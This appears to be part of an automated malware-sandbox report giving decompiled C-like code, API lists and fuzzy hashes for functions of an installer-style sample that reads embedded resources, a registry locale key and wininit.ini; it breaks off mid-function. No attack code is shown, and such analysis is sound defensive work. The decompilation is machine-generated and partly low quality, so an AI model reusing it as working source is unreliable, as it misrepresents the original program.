                                                                                                                                                                                                        0x00bc4400
                                                                                                                                                                                                        0x00bc4403
                                                                                                                                                                                                        0x00bc440b
                                                                                                                                                                                                        0x00bc4420
                                                                                                                                                                                                        0x00bc4429
                                                                                                                                                                                                        0x00bc4437
                                                                                                                                                                                                        0x00bc4444
                                                                                                                                                                                                        0x00bc4447
                                                                                                                                                                                                        0x00bc444d
                                                                                                                                                                                                        0x00bc4454
                                                                                                                                                                                                        0x00bc445b
                                                                                                                                                                                                        0x00bc4460
                                                                                                                                                                                                        0x00bc4461
                                                                                                                                                                                                        0x00bc4467
                                                                                                                                                                                                        0x00bc446f
                                                                                                                                                                                                        0x00bc4473
                                                                                                                                                                                                        0x00bc4473
                                                                                                                                                                                                        0x00bc4463
                                                                                                                                                                                                        0x00bc4463
                                                                                                                                                                                                        0x00bc4463
                                                                                                                                                                                                        0x00bc447a
                                                                                                                                                                                                        0x00bc4481
                                                                                                                                                                                                        0x00bc4484
                                                                                                                                                                                                        0x00bc448a
                                                                                                                                                                                                        0x00bc4492
                                                                                                                                                                                                        0x00bc4496
                                                                                                                                                                                                        0x00bc4496
                                                                                                                                                                                                        0x00bc4486
                                                                                                                                                                                                        0x00bc4486
                                                                                                                                                                                                        0x00bc4486
                                                                                                                                                                                                        0x00bc44b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BC43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BC440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00BC4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00BC442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00BC443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00BC4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00BC44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: c9eb54818659cb5f1261a661d6c9d6cc7337756c1acaef694e5cdf2843101031
                                                                                                                                                                                                        • Instruction ID: f49224fe5bcfbff648924b66cfbc429494d609ddb98e193ac916f04f31e55cce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9eb54818659cb5f1261a661d6c9d6cc7337756c1acaef694e5cdf2843101031
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23312D72E00119AFCB14CFB8DD99DEEBBB5EB89314F254169F805F3250DA306D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00BC6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00BC171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xbc9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xbca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00BC171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00BC6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                        0x00bc6298
                                                                                                                                                                                                        0x00bc62a0
                                                                                                                                                                                                        0x00bc62a7
                                                                                                                                                                                                        0x00bc62ad
                                                                                                                                                                                                        0x00bc62af
                                                                                                                                                                                                        0x00bc62bb
                                                                                                                                                                                                        0x00bc62c3
                                                                                                                                                                                                        0x00bc62c4
                                                                                                                                                                                                        0x00bc633b
                                                                                                                                                                                                        0x00bc633b
                                                                                                                                                                                                        0x00bc6345
                                                                                                                                                                                                        0x00bc634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc62da
                                                                                                                                                                                                        0x00bc62de
                                                                                                                                                                                                        0x00bc635f
                                                                                                                                                                                                        0x00bc6369
                                                                                                                                                                                                        0x00bc62e0
                                                                                                                                                                                                        0x00bc62e0
                                                                                                                                                                                                        0x00bc62e0
                                                                                                                                                                                                        0x00bc62e3
                                                                                                                                                                                                        0x00bc62e5
                                                                                                                                                                                                        0x00bc62e5
                                                                                                                                                                                                        0x00bc62e8
                                                                                                                                                                                                        0x00bc62e8
                                                                                                                                                                                                        0x00bc62ea
                                                                                                                                                                                                        0x00bc62eb
                                                                                                                                                                                                        0x00bc62ef
                                                                                                                                                                                                        0x00bc62f1
                                                                                                                                                                                                        0x00bc62f3
                                                                                                                                                                                                        0x00bc6302
                                                                                                                                                                                                        0x00bc6308
                                                                                                                                                                                                        0x00bc630d
                                                                                                                                                                                                        0x00bc6314
                                                                                                                                                                                                        0x00bc6314
                                                                                                                                                                                                        0x00bc6316
                                                                                                                                                                                                        0x00bc6319
                                                                                                                                                                                                        0x00bc6355
                                                                                                                                                                                                        0x00bc6357
                                                                                                                                                                                                        0x00bc631b
                                                                                                                                                                                                        0x00bc631b
                                                                                                                                                                                                        0x00bc6331
                                                                                                                                                                                                        0x00bc6334
                                                                                                                                                                                                        0x00bc6339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6339
                                                                                                                                                                                                        0x00bc6319
                                                                                                                                                                                                        0x00bc636b
                                                                                                                                                                                                        0x00bc637d
                                                                                                                                                                                                        0x00bc637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00BC6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: fa7921a4d9c445c376f40e47b03fb0c7b620fbd2e9043dc35f5703a4ac931210
                                                                                                                                                                                                        • Instruction ID: 41a09e730be1d4831f8c3c62a861b7e836b3ed62af2f6594c1f71c03bbbc86c9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa7921a4d9c445c376f40e47b03fb0c7b620fbd2e9043dc35f5703a4ac931210
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7721E775A00219ABDB109F68DC49EFFBBB8FF89714B14015DF902A3241DB359D068BE5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t19 ^ _t44;
				_t41 =  *0xbc81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xbc81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xbc81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xbc1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00BC66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xbc81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00BC6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                        0x00bc681f
                                                                                                                                                                                                        0x00bc682a
                                                                                                                                                                                                        0x00bc6831
                                                                                                                                                                                                        0x00bc6836
                                                                                                                                                                                                        0x00bc683c
                                                                                                                                                                                                        0x00bc683e
                                                                                                                                                                                                        0x00bc6848
                                                                                                                                                                                                        0x00bc6851
                                                                                                                                                                                                        0x00bc685d
                                                                                                                                                                                                        0x00bc6864
                                                                                                                                                                                                        0x00bc6876
                                                                                                                                                                                                        0x00bc693a
                                                                                                                                                                                                        0x00bc693a
                                                                                                                                                                                                        0x00bc687c
                                                                                                                                                                                                        0x00bc687e
                                                                                                                                                                                                        0x00bc6885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc68d6
                                                                                                                                                                                                        0x00bc68f4
                                                                                                                                                                                                        0x00bc6900
                                                                                                                                                                                                        0x00bc6902
                                                                                                                                                                                                        0x00bc690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc690c
                                                                                                                                                                                                        0x00bc690c
                                                                                                                                                                                                        0x00bc691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc691e
                                                                                                                                                                                                        0x00bc6924
                                                                                                                                                                                                        0x00bc692b
                                                                                                                                                                                                        0x00bc6932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc692b
                                                                                                                                                                                                        0x00bc691c
                                                                                                                                                                                                        0x00bc690a
                                                                                                                                                                                                        0x00bc6885
                                                                                                                                                                                                        0x00bc6876
                                                                                                                                                                                                        0x00bc6951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00BC686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00BC68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00BC68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,?,0000000C), ref: 00BC68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC6902
                                                                                                                                                                                                          • Part of subcall function 00BC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00BC691A), ref: 00BC6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00BC68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 48b7736434e10599ac798c11aad5d862157937785e51606aa83c44d9bcfed4ec
                                                                                                                                                                                                        • Instruction ID: dcd402920d4aba4dfbafc7eaf284f3d8a5cbdc8f71466964751d030feda45e19
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48b7736434e10599ac798c11aad5d862157937785e51606aa83c44d9bcfed4ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC316D31A002289FDB21CB11CC45FAAB7F9FB8D768F0401E9E949A7150DBB09E85CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00BC468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xbc8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00BC468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xbc8d4c, "<None>") == 0) {
							LocalFree( *0xbc8d4c);
							L9:
							 *0xbc9124 = 0;
							return 1;
						}
						_t9 = E00BC6517(_t19, 0x7d1, 0, E00BC3100, 0, 0);
						LocalFree( *0xbc8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xbc9124 = 0x800704c7;
						L2:
						return 0;
					}
					E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xbc8d4c);
					 *0xbc9124 = 0x80070714;
					goto L2;
				}
				E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xbc9124 = E00BC6285();
				goto L2;
			}






                                                                                                                                                                                                        0x00bc3a46
                                                                                                                                                                                                        0x00bc3a57
                                                                                                                                                                                                        0x00bc3a5d
                                                                                                                                                                                                        0x00bc3a63
                                                                                                                                                                                                        0x00bc3a6a
                                                                                                                                                                                                        0x00bc3a91
                                                                                                                                                                                                        0x00bc3a9a
                                                                                                                                                                                                        0x00bc3ad8
                                                                                                                                                                                                        0x00bc3b13
                                                                                                                                                                                                        0x00bc3b19
                                                                                                                                                                                                        0x00bc3b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3b21
                                                                                                                                                                                                        0x00bc3ae7
                                                                                                                                                                                                        0x00bc3af4
                                                                                                                                                                                                        0x00bc3afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3afe
                                                                                                                                                                                                        0x00bc3a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3a87
                                                                                                                                                                                                        0x00bc3aa8
                                                                                                                                                                                                        0x00bc3ab3
                                                                                                                                                                                                        0x00bc3ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3ab9
                                                                                                                                                                                                        0x00bc3a78
                                                                                                                                                                                                        0x00bc3a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F64,?,00000002,00000000), ref: 00BC3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00BC3AB3
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00BC3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00BC3B13
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                          • Part of subcall function 00BC6517: LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                          • Part of subcall function 00BC6517: DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00BC3100,00000000,00000000), ref: 00BC3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 010b025343b9ada5682411d8e8c8e38feaf20b83a07e8ff636e66b0b4e7a5cbe
                                                                                                                                                                                                        • Instruction ID: 561a6dbeea46fd246b1e10f2bd5ee27158988fad6d4ff53ba47a926467f2f6a9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 010b025343b9ada5682411d8e8c8e38feaf20b83a07e8ff636e66b0b4e7a5cbe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A311D671300201ABD724AF32AC09F1B3AF9DBDDB40B14847EB546EB2A1DE798C108721
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00BC658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00BC6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                        0x00bc24e0
                                                                                                                                                                                                        0x00bc24eb
                                                                                                                                                                                                        0x00bc24f2
                                                                                                                                                                                                        0x00bc24f7
                                                                                                                                                                                                        0x00bc2504
                                                                                                                                                                                                        0x00bc250e
                                                                                                                                                                                                        0x00bc251d
                                                                                                                                                                                                        0x00bc252c
                                                                                                                                                                                                        0x00bc2541
                                                                                                                                                                                                        0x00bc2546
                                                                                                                                                                                                        0x00bc2553
                                                                                                                                                                                                        0x00bc2555
                                                                                                                                                                                                        0x00bc2555
                                                                                                                                                                                                        0x00bc2546
                                                                                                                                                                                                        0x00bc256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00BC2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00BC252C
                                                                                                                                                                                                        • _lopen.KERNEL32(?,00000040), ref: 00BC253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00BC254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00BC2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: fa13c60b570e79c6d665446bc14c846faf6f5da7c10557ddce099b652b17a357
                                                                                                                                                                                                        • Instruction ID: e978de337e164e25418f5ec1d8a2a79ae21a472b1a340a83911e7a397279103c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa13c60b570e79c6d665446bc14c846faf6f5da7c10557ddce099b652b17a357
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B501D832A0011C67C7209B65DC0CEDFBBBCDB59794F0001A9FA49D3190DF748E45CAA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xbc8184 = 1;
						 *0xbc8180 = 1;
						L13:
						 *0xbc9a40 = _t119;
						L14:
						__eflags =  *0xbc8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
